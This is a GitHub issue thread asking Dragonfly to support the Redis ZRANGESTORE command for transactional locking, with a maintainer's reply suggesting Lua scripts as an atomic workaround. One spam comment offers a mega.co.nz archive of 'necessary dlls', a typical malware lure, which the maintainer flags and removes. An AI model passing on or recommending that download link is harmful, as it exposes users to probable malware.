### ISSUE TITLE
Support `ZRANGESTORE` Command in Dragonfly

### ISSUE THREAD

**Issue by atx-skn** [dragonflydb/dragonfly#3742]
**Is your feature request related to a problem? Please describe.**
We tried using Dragonfly as an alternative to Redis. While it worked well overall, it does not support the `ZRANGESTORE` command, which is crucial for us to create mutex locks within a transaction. We limit the number of requests used for creating a lock by storing some in a temporary cache with `ZRANGESTORE`. This command would allow us to create locks in a transaction, ensuring ACID compliance.

**Describe the solution you'd like**
 Support for the [ZRANGESTORE ](https://redis.io/docs/latest/commands/zrangestore/) command, which has been available since Redis 6.2.0.

**Describe alternatives you've considered**
Without this command, we would need to store the result of `ZRANGE` in a variable and insert it afterward. While this could be done transactionally using a LUA script, it does not provide the benefits of a true transaction.

**Comment by websquadpro** [comment]
try this
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
I put the necessary dlls in the archive

**Comment by chakaz** [comment]
@websquadpro I have reported your comment as spam and removed it.

**Comment by chakaz** [comment]
Hi @atx-skn 
Thanks for reporting this issue.
Indeed, `ZRANGESTORE` is one of the last few commands yet unsupported by Dragonfly.
While we do want to implement this, it is currently not planned for the upcoming releases.
If you can code in C++, you may attempt to implement this yourself. The building blocks are there, and I am happy to review and guide you through it.

> Without this command, we would need to store the result of ZRANGE in a variable and insert it afterward. While this could be done transactionally using a LUA script, it does not provide the benefits of a true transaction.
Actually, Lua scripts *are* transactions in Dragonfly, unless one specified non-atomic Lua mode (which is not the default). So feel free to use that as a workaround for now, but I agree that it's less convenient and less efficient than the native command.
